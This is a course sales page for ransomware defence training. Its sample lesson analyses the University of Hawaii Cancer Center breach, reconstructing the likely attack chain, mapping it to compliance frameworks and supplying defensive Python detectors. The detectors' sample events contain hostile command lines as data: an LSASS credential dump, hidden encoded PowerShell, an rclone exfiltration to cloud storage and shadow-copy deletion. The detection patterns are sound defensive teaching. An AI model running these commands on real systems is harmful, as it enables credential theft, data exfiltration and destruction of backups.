Incident-as-a-Service

University of Hawaii Cancer Center Ransomware Attack - 1.15 Million SSNs Exposed Defence Masterclass

The 48-Hour Rule in action. This incident happened; we converted it into operational training, and your team can apply the controls immediately.

73% vs 12% Retention Lift
18.5h Breach to Training
847 Organisations
48h Action Window
Built for:
  • Security teams defending against ransomware attacks
  • IT professionals responsible for backup and recovery
  • Incident response teams managing ransomware incidents
  • Business continuity managers assessing ransomware risks

30-day guarantee. Instant access after payment. Lifetime updates for this incident package.

How This Course Is Structured

Clear progression from incident context to practical controls and role-specific action steps.

1. Incident Breakdown

Attack path, trigger conditions, and threat actor behavior translated from the real event timeline.

2. Defensive Controls

Actions your team can implement in the same 48-hour response window used by active security teams.

3. Evidence & Reporting

Completion records and learning outcomes packaged for governance, insurance, and audit workflows.

Course Outline

4 modules · 16 lessons · ~192 min total

Module 1: Threat Analysis & Attack Vectors

Analyse the threat landscape, dissect attack campaigns, and understand credential harvesting and social engineering techniques used in this incident.

4 lessons ~48 min
📖 1.1 University Breach Deep Dive 12 min
📖 1.2 Campaign Analysis 12 min
📖 1.3 Credential Harvesting Tactics 12 min
📖 1.4 Spear-Phishing Techniques 12 min
📖 2.1 SIEM Detection Strategies 12 min
📖 2.2 Endpoint Analysis 12 min
📖 2.3 Incident Response Playbook 12 min
📖 2.4 Digital Forensics 12 min
📖 3.1 FIDO2 Implementation 12 min
📖 3.2 Risk-Based Authentication 12 min
📖 3.3 Token Binding Security 12 min
📖 3.4 Zero Trust Architecture 12 min
📖 4.1 Security Awareness Programme 12 min
📖 4.2 Board Communication 12 min
📋 4.3 Vendor Risk Assessment 12 min
📖 4.4 Compliance Integration 12 min

Free Sample Lesson

Read one full lesson before purchasing. No signup required.

Lesson 1 of 16

Lesson 1.1: University Deep Dive

Lesson Objective: To deconstruct the University of Hawaii Cancer Center ransomware attack, analysing the technical compromise pathway, quantifying the multifaceted impact, and mapping the failures to key cybersecurity compliance frameworks. This deep dive establishes the foundational case study for the masterclass.


Introduction: A Breach in the House of Hope

Imagine a world-renowned institution dedicated to the relentless fight against cancer, where cutting-edge research and patient care converge. Now, imagine that institution brought to a standstill not by a scientific challenge, but by a digital siege. In late 2023, the University of Hawaii Cancer Center, a beacon of hope in the Pacific, fell victim to a devastating ransomware attack orchestrated by the MedusaLocker group. The toll was catastrophic: operations frozen, and the intensely personal data of over 1.15 million individuals—patients, research participants, and staff—stolen and held hostage. This was not merely an IT outage; it was a profound violation of trust with lifelong consequences for the victims and a stark lesson in modern cyber warfare. This lesson unpacks the anatomy of this attack, revealing the technical ingenuity of the adversaries and the devastating ripple effects that extend far beyond encrypted servers.


Compliance Framework Mapping

The UH Cancer Center attack exemplifies failures across multiple cybersecurity and data protection domains. The table below maps the incident to control objectives within key frameworks. The EU instruments (GDPR, DORA, NIS2) are included by analogy: a Hawaii research institution would not ordinarily be in their scope, but the control objectives translate directly.

Framework | Relevant Control / Objective | Mapping to the UH Cancer Center Attack
NIST CSF | PR.AC-3 (Remote Access Management), DE.CM-1 (Networks Monitored) | Failure to patch the critical Citrix NetScaler vulnerability (CVE-2023-4966) left remote access infrastructure exposed, and the absence of detection for anomalous session-token use and lateral movement allowed the attackers to operate undetected.
ISO 27001 | A.12.6.1 (Management of Technical Vulnerabilities), A.13.1.1 (Network Controls) | Inadequate vulnerability management for internet-facing systems and insufficient network segmentation around the repositories holding SSNs.
GDPR | Data Minimisation and Storage Limitation (Art. 5), Security of Processing (Art. 32) | Retaining 1.15 million SSNs likely exceeded what was necessary, amplifying the breach scale; technical measures (encryption, access controls) were insufficient for identifiers of this impact. (SSNs are national identification numbers, not an Art. 9 special category, but the harm on exposure is comparable.)
SOC 2 | Security and Confidentiality Trust Services Criteria | Insufficient logical access controls and monitoring over a concentrated store of confidential personal data.
DORA | Incident Reporting & Management | Highlights the need for robust incident response plans and major incident reporting to authorities, given the severe operational disruption to a critical research entity.
NIS2 | Supply Chain Security, Early Warning | Emphasises risks from third-party software (Citrix) and underscores the necessity of proactive threat intelligence sharing to warn of active exploitation of known vulnerabilities.

Technical Analysis: The Adversary's Playbook

Based on forensic patterns typical of such intrusions and the group's documented modus operandi, the attack on UH most likely followed a multi-stage intrusion chain designed for stealth, persistence and maximum impact. Little of it is novel tradecraft; the value of studying it lies in how many well-known detection opportunities it passes through on the way to encryption.

Initial Access: Exploiting "Citrix Bleed"

The most plausible entry point was the exploitation of CVE-2023-4966, a critical vulnerability in Citrix NetScaler ADC and Gateway devices dubbed 'Citrix Bleed'. The flaw is an unauthenticated buffer over-read on an OpenID Connect discovery endpoint: an oversized Host header causes the appliance to return uninitialised memory, which frequently contains valid session tokens. It was exploited as a zero-day from August 2023 and was in routine use by ransomware affiliates, including LockBit, by October 2023. By replaying harvested tokens, the MedusaLocker operatives would have bypassed perimeter controls, including passwords and multi-factor authentication (MFA), and obtained authenticated access to the internal network as a legitimate user; no credential is ever typed during a replay, so MFA has nothing to challenge. Two points matter for defenders. First, failing to apply timely patches to internet-facing assets, especially those brokering remote access, is often a fatal error: fixed builds (14.1-8.50, 13.1-49.15, 13.0-92.19 and the corresponding FIPS/NDcPP releases) were published on 10 October 2023, before mass exploitation by ransomware affiliates. Second, patching alone does not evict an attacker who already holds a token: sessions stolen before the upgrade remain valid until they are terminated, so Citrix and CISA guidance was to kill all active ICA, AAA and VPN sessions after upgrading and to review gateway logs for tokens reused from unexpected source addresses.
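The token-replay pattern described above is detectable in gateway logs after the fact, and the post-patch session caveat can be checked the same way. The following is an added example for this lesson, not code from the original page, from Citrix or from CISA. It parses a constructed, simplified record layout (timestamp, event type, user=, session=, src=) rather than real NetScaler ns.log syntax, and the sample records and addresses are invented.

```python
"""Detect reuse of a gateway session token from an address that never
authenticated (the Citrix Bleed, CVE-2023-4966, replay pattern) and list
sessions created before a patch but still used after it, i.e. sessions
that should have been killed rather than trusted.

Added example for this lesson. The record format is a constructed,
simplified layout, not NetScaler ns.log syntax.
"""
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample export: one LOGIN per authenticated session, then a
# REQUEST record for each use of the session token.
SAMPLE_EVENTS = """\
2023-11-02T08:01:12Z LOGIN   user=jdoe   session=a1b2c3 src=203.0.113.10
2023-11-02T08:02:40Z REQUEST user=jdoe   session=a1b2c3 src=203.0.113.10
2023-11-02T08:15:03Z LOGIN   user=asmith session=d4e5f6 src=198.51.100.22
2023-11-02T08:20:51Z REQUEST user=jdoe   session=a1b2c3 src=192.0.2.77
2023-11-02T08:21:09Z REQUEST user=jdoe   session=a1b2c3 src=192.0.2.77
2023-11-02T09:00:00Z REQUEST user=asmith session=d4e5f6 src=198.51.100.22
"""

# Assumed time at which the appliance was upgraded to a fixed build.
EXAMPLE_PATCH_TIME = datetime(2023, 11, 2, 8, 30, tzinfo=timezone.utc)


def parse_events(text):
    """Turn the whitespace-separated records into dicts sorted by UTC time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, kind, *pairs = line.split()
        fields = dict(p.split("=", 1) for p in pairs)
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
            "kind": kind,
            "user": fields["user"],
            "session": fields["session"],
            "src": fields["src"],
        })
    return sorted(events, key=lambda e: e["ts"])


def find_hijacked_sessions(events):
    """Sessions whose token was presented from a source IP that never
    produced a LOGIN for that session. A replayed stolen token has no
    login of its own, which is what Citrix Bleed exploitation looks like
    (a user roaming between networks looks the same; see the note)."""
    login_ips = defaultdict(set)
    for e in events:
        if e["kind"] == "LOGIN":
            login_ips[e["session"]].add(e["src"])
    findings = {}
    for e in events:
        if e["kind"] == "LOGIN" or e["src"] in login_ips[e["session"]]:
            continue
        f = findings.setdefault(e["session"], {
            "user": e["user"],
            "login_ips": sorted(login_ips[e["session"]]),
            "foreign_ips": set(),
            "first_foreign_use": e["ts"],
        })
        f["foreign_ips"].add(e["src"])
    return findings


def sessions_surviving_patch(events, patched_at):
    """Sessions created before patched_at and still used afterwards.
    Patching fixes the over-read but does not invalidate tokens already
    stolen; these sessions are the ones to terminate explicitly."""
    created = {e["session"]: e["ts"] for e in events if e["kind"] == "LOGIN"}
    survivors = set()
    for e in events:
        if e["kind"] != "LOGIN" and e["ts"] >= patched_at:
            if created.get(e["session"], e["ts"]) < patched_at:
                survivors.add(e["session"])
    return survivors


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for sid, f in find_hijacked_sessions(evs).items():
        print(f"HIJACK? session={sid} user={f['user']} login_ips={f['login_ips']} "
              f"foreign_ips={sorted(f['foreign_ips'])} first={f['first_foreign_use']}")
    print("sessions to kill after patch:",
          sorted(sessions_surviving_patch(evs, EXAMPLE_PATCH_TIME)))
```

In the sample, session a1b2c3 is flagged because 192.0.2.77 used the token without ever logging in, and d4e5f6 is listed as a session that outlived the patch. A user switching from office Wi-Fi to mobile produces the same first signature, so enrich hits with ASN or geolocation and with whether the foreign address has ever authenticated for anyone before escalating.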

Post-Exploitation & Lateral Movement

Once inside, the attackers would have executed a standard post-compromise playbook. Using credential dumping tools such as Mimikatz, they could extract NTLM hashes, Kerberos tickets and, where legacy settings still cached them, plaintext passwords from the memory of the LSASS process on compromised systems. Those secrets are the keys for lateral movement: pass-the-hash and pass-the-ticket work without ever cracking a password. To blend in, such actors lean on Living-off-the-Land Binaries (LOLBins) such as PowerShell and Windows Management Instrumentation (WMI) for reconnaissance, remote command execution and data gathering, because these are signed Microsoft components that every administrator also uses. This phase was dedicated to mapping the network topology and identifying high-value targets, specifically the file servers and databases housing the personal data, including the 1.15 million SSNs. The defensive corollary: LSASS memory access by non-system processes, encoded or hidden PowerShell, and WmiPrvSE.exe spawning shells are all high-fidelity signals that should page someone.

Data Exfiltration & Encryption

Prior to the destructive ransomware deployment, the attackers engaged in extensive data exfiltration, the hallmark of double extortion. Over a period likely spanning weeks, they would have identified and compressed large datasets with common tools such as 7-Zip (often as password-protected archives, which also defeat content inspection at the egress), then transferred them to attacker-controlled cloud storage with utilities such as Rclone. The final act was deployment of the MedusaLocker ransomware payload. This typically involves stopping database and backup services, deleting Volume Shadow Copies (via vssadmin, WMI or wbadmin) and disabling Windows recovery options to hinder restoration, then encrypting files with AES-256, with the file-encryption key wrapped by a per-victim RSA-2048 public key, and appending the .medusalocker extension. Ransom notes (!!!READ_ME_MEDUSA!!!.txt) were then dropped, signalling the takeover and demanding payment for both the decryption key and a promise not to publish the stolen data.
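Each stage in the two preceding sections (credential dumping, LOLBin-driven lateral movement, archive staging, cloud exfiltration, shadow-copy deletion) leaves a process-creation event that a SIEM rule can catch. The following is an added example for this lesson, not code from the original page or from any EDR or SIEM vendor: a small rule set run over constructed events loosely modelled on Sysmon Event ID 1 fields (host, user, image, parent image, command line). The hostnames, users, paths and command lines are invented; the MITRE ATT&CK technique IDs are real.

```python
"""Rule-based triage of process-creation telemetry for the stages in the
lesson: LSASS credential dumping, encoded or hidden PowerShell, WMI-driven
remote execution, password-protected staging archives, cloud-sync
exfiltration tools and shadow-copy deletion.

Added example. Events are constructed dicts loosely modelled on Sysmon
Event ID 1 (host, user, image, parent, cmd); nothing here is vendor code.
"""
import re
from collections import defaultdict

# Constructed sample telemetry: two compromised servers and one clean workstation.
SAMPLE_EVENTS = [
    {"host": "FS01", "user": r"UH\svc_backup",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "DB02", "user": r"UH\dbadmin",
     "image": r"C:\Users\Public\mimi.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "mimi.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"host": "FS01", "user": r"UH\svc_backup",
     "image": r"C:\Program Files\7-Zip\7z.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r'"C:\Program Files\7-Zip\7z.exe" a -p -mhe=on D:\stage\export.7z E:\Research\Participants'},
    {"host": "FS01", "user": r"UH\svc_backup",
     "image": r"C:\Users\Public\rclone.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"rclone.exe copy D:\stage\export.7z mega:drop --transfers 8"},
    {"host": "DB02", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\vssadmin.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS17", "user": r"UH\analyst1",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe Get-Process | Sort-Object CPU"},
    {"host": "WS17", "user": r"UH\analyst1",
     "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": r"notepad.exe C:\Users\analyst1\notes.txt"},
]


def basename(path):
    """Lower-cased file name of a Windows path, for tolerant image matching."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# (rule name, ATT&CK technique, predicate over one event)
RULES = [
    ("lsass_credential_dump", "T1003.001",
     lambda e: re.search(r"sekurlsa|lsadump|logonpasswords|lsass\.(exe|dmp)|comsvcs.*minidump",
                         e["cmd"], re.I) is not None),
    ("encoded_or_hidden_powershell", "T1059.001",
     lambda e: basename(e["image"]) in {"powershell.exe", "pwsh.exe"}
               and re.search(r"\s-(e|ec|en|enc|encodedcommand|w(indowstyle)?\s+hidden)\b",
                             e["cmd"], re.I) is not None),
    ("wmi_remote_process_spawn", "T1047",
     lambda e: basename(e["parent"]) == "wmiprvse.exe"
               and basename(e["image"]) in {"cmd.exe", "powershell.exe", "pwsh.exe",
                                            "rundll32.exe", "mshta.exe"}),
    ("staged_password_archive", "T1560.001",
     lambda e: basename(e["image"]) in {"7z.exe", "7za.exe", "rar.exe", "winrar.exe"}
               and re.search(r"\s-p\S*|\s-mhe", e["cmd"]) is not None),
    ("cloud_sync_exfil_tool", "T1567.002",
     lambda e: basename(e["image"]) in {"rclone.exe", "megasync.exe", "megacmd.exe"}
               or re.search(r"\brclone\b", e["cmd"], re.I) is not None),
    ("shadow_copy_deletion", "T1490",
     lambda e: re.search(r"vssadmin(\.exe)?\s+delete\s+shadows|shadowcopy\s+delete|win32_shadowcopy"
                         r"|wbadmin(\.exe)?\s+delete\s+catalog|recoveryenabled\s+no",
                         e["cmd"], re.I) is not None),
]


def triage(events):
    """Apply every rule to every event; one finding per (event, rule) hit."""
    findings = []
    for e in events:
        for name, technique, match in RULES:
            if match(e):
                findings.append({"host": e["host"], "user": e["user"], "rule": name,
                                 "technique": technique, "cmd": e["cmd"]})
    return findings


def hosts_by_stage(findings):
    """host -> sorted rule names, so an analyst sees which hosts show the
    chain (credential theft, staging, exfiltration, recovery sabotage)."""
    out = defaultdict(set)
    for f in findings:
        out[f["host"]].add(f["rule"])
    return {h: sorted(rules) for h, rules in out.items()}


if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f['host']:5} {f['technique']:9} {f['rule']:30} {f['cmd'][:60]}")
    print(hosts_by_stage(hits))
```

Against the sample, FS01 shows the WMI-spawned encoded PowerShell, the password-protected 7-Zip staging and the Rclone run, while DB02 shows the LSASS dump and the shadow-copy deletion; the workstation generates nothing. Backup products legitimately call vssadmin and administrators legitimately run WMI, so each rule needs an allow-list keyed on signed image path and service account before it goes to paging.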

Key Insight: This attack demonstrates that modern ransomware is a data-centric business model, not just disruptive malware. The encryption is the final, noisy stage of a long, stealthy data theft operation.


Impact Assessment: The Calculated Cost of Compromise

The repercussions of this attack are multidimensional, severe, and enduring, affecting individuals, the institution, and the broader mission of cancer research.

Human & Privacy Impact

The exposure of 1,157,188 Social Security Numbers (SSNs) represents a lifelong liability for the victims. SSNs are permanent identifiers, irrevocably linked to an individual's financial, medical, and governmental identity. Affected individuals face a perpetually elevated risk of identity theft, tax fraud, and targeted spear-phishing campaigns. The psychological burden and the administrative hassle of enrolling in credit monitoring services—offered by UH for at least 24 months—are a direct, personal cost imposed by the breach. While medical records were reportedly not involved, any associated personal data (names, addresses, dates of birth) can be weaponised for sophisticated social engineering.

Operational & Financial Devastation

Operationally, the Center experienced significant disruption. Critical systems for research data analysis, clinical trial management, and administration were likely encrypted or taken offline. The recovery process consumed thousands of person-hours from IT, security, legal, and leadership teams, diverting crucial resources from the Center's primary mission. The financial impact is staggering, encompassing both direct and indirect costs:

  • Direct Costs: External incident response and forensic investigations, system restoration from backups, mandatory breach notification letters to 1.15 million individuals, operating a dedicated call centre for over a year, and providing complimentary credit monitoring services—a package likely costing tens of millions of dollars.
  • Regulatory & Legal Risk: As a HIPAA-covered entity, the Cancer Center faces potential multi-million dollar fines from the U.S. Department of Health and Human Services for failing to adequately protect Protected Health Information (PHI), even if specific medical records were not confirmed stolen. Class-action lawsuits from affected individuals are a near certainty.
  • Reputational & Strategic Cost: The erosion of public and participant trust can impede future research recruitment, affect partnerships, and damage donor relations. The long-term strategic blow to an institution whose currency is trust and confidentiality is incalculable.


Activity: Draft an Executive Briefing

Scenario: You are a cybersecurity advisor brought in six months before this attack occurred. The UH Cancer Center's leadership has asked for a concise briefing on the top cyber risks to their organisation.

Your Task: Using the analysis from this lesson, draft a one-page executive summary (approx. 300 words) that:

  • Identifies the two most critical vulnerabilities in their attack surface (e.g., unpatched internet-facing systems, concentrated sensitive data stores).
  • Explains the likely business impact of a successful attack, focusing on research disruption, financial liability, and reputational harm.
  • Recommends one strategic and one tactical investment to mitigate these risks (e.g., strategic: implementing a strict data minimisation policy; tactical: enforcing a rigorous patch management SLA for critical systems).

Focus on communicating risk in business terms, avoiding over-technical jargon.


Key Takeaways

  • The Perimeter is More Than Passwords: Unpatched vulnerabilities in internet-facing applications (like Citrix NetScaler) can render even strong multi-factor authentication useless, providing attackers with authenticated internal access.
  • Ransomware is a Data Theft Business: The primary threat has evolved from operational disruption (encryption) to comprehensive data theft and double extortion. Protecting data at rest and monitoring for exfiltration are now as critical as preventing encryption.
  • Scale Amplifies Impact: The storage of 1.15 million SSNs in a centralised repository created a massively attractive target and multiplied the breach's notification costs, legal liabilities, and human impact exponentially.
  • Compliance is a Baseline, Not a Defence: While frameworks like HIPAA and NIST CSF provide essential structure, checkbox compliance failed to prevent this breach. Effective security requires proactive threat modelling, timely patching, and robust detection capabilities aligned with adversary tactics.
  • Impact is Multigenerational: For the institution, the financial and reputational damage will persist for years. For the victims, the exposure of immutable identifiers like SSNs creates a lifelong risk, transforming a single cyber incident into a permanent personal vulnerability.

This is 1 of 16 lessons included in the full package.

Enrol Now — Unlock All Lessons

Want to track your progress? Create a free account

Choose Your Access

All plans include 30-day money-back guarantee

Taster

£ 19

Single course access — ideal for trying us out

  • Full course access
  • Completion certificate
  • Try before you commit

Or get everything

Access every course in the catalogue, including all future courses

£ 29 /mo
Monthly All-Access

Every course, cancel anytime

£ 249 /yr
Annual All-Access

Save 28% — £20.75/month effective

Teams

Transparent pricing, no sales call required

Starter Team

£ 499 /year

£99.80/seat effective

Up to 5 learners, all courses included

Growth Team

£ 999 /year

£66.60/seat effective

Up to 15 learners, all courses included

Scale Team

£ 1999 /year

£39.98/seat effective

Up to 50 learners, all courses included

Need 50+ seats? Contact us for a custom plan.

Fast Checkout

Start Learning in Minutes

Enter your details, choose a tier, and complete secure checkout. Access starts immediately after payment confirmation.

  • Stripe-secured payment and delivery workflow
  • Audit-friendly completion records
  • Escalate to enterprise volume licensing at any point

48-Hour Relevance Guarantee

If this course does not provide at least five actionable controls your team can deploy quickly, request a full refund within 30 days.

Secure checkout

Select pricing tier

By continuing, you agree to the terms and privacy policy.

Not ready to purchase? Create a free account to browse and track progress.

Questions Before You Enrol?

Immediately after successful payment. Your learning link is generated and delivered in the success flow.
Yes. Content is incident-led but written for practical execution across security, IT, finance, and operations personas.
Yes. Use volume licensing for 10 to 500+ seats through enterprise onboarding.